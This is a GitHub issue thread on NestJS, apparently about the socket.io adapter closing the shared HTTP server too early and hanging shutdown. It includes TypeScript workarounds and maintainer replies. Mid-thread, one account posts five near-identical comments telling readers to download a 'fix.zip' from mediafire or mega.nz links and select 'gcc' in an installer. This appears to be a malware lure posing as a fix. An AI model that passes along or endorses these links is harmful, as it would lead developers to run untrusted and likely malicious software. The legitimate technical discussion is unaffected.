### ISSUE TITLE
Socket.IO Adapter Close causes premature HTTP Server close() call and blocks application shutdown

### ISSUE THREAD

**Issue by laino** [nestjs/nest#13910]
On Nest application shutdown, ``close()`` is called on the socket.io server [here](https://github.com/nestjs/nest/blob/e4b07eb06b406183e708269e0439f442a1dadb1c/packages/websockets/adapters/ws-adapter.ts#L39).

Internally *socket.io* will now disconnect all sockets handled by itself, **then calls close() on the underlying http server** [here](https://github.com/socketio/socket.io/blob/5d9a2d554440f69a0b729e276cc2578a10a173e5/packages/socket.io/lib/index.ts#L764).

This is a problem because now we are blocking until all connections on the underlying http server are closed, but before the nest application has any chance to run logic that would disconnect other long-running connections. That means that if there's a long running connection that wasn't handled by that socket.io adapter, we now block forever. 

For instance [this](https://github.com/nestjs/nest/blob/e4b07eb06b406183e708269e0439f442a1dadb1c/packages/platform-express/adapters/express-adapter.ts#L438) disconnect logic is never reached.

**Comment by laino** [comment]
As a workaround you can hack in your own logic that disconnects clients and prevents new connections before initiating application shutdown.

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by laino** [comment]
Here's a workaround:

```ts
// FIXME: workaround for https://github.com/nestjs/nest/issues/13910
if (forceCloseConnections) {
    const server = (app as NestExpressApplication).getHttpServer();
    const sockets = new Set<Socket>();

    server.on('connection', (sock) => {
        sockets.add(sock);
        sock.on('close', () => sockets.delete(sock));
    });

    server.close = (close => (cb) => {
        sockets.forEach(sock => sock.destroySoon());
        return close(cb);
    })(server.close.bind(server));
}
```

Replace ``sock.destroySoon()`` with ``sock.destroy()`` depending on the behavior you want.

**Comment by laino** [comment]
I think the proper fix for this is to never call ``SocketIOServer.close()``, and instead track connections ourselves in the adapter and destroy them on close.

**Comment by kamilmysliwiec** [comment]
Would you like to create a PR for this issue? We should only do that for adapters that don't share the HTTP server instance (so for those that use a different port than a host application)

**Comment by besrabasant** [comment]
```
// FIXME: workaround for https://github.com/nestjs/nest/issues/13910
if (forceCloseConnections) {
    const server = (app as NestExpressApplication).getHttpServer();

    server.close = (close => (cb) => {
        close(cb);
        server.closeAllConnections();
        return server;
    })(server.close.bind(server));
}
```

@laino Could you please provide a full example of this?

**Comment by sapenlei** [comment]
> Would you like to create a PR for this issue? We should only do that for adapters that don't share the HTTP server instance (so for those that use a different port than a host application)

I want to create a PR for this.

**Comment by kamilmysliwiec** [comment]
PRs are more than welcome

**Comment by kamilmysliwiec** [comment]
Let's track this here https://github.com/nestjs/nest/pull/14185
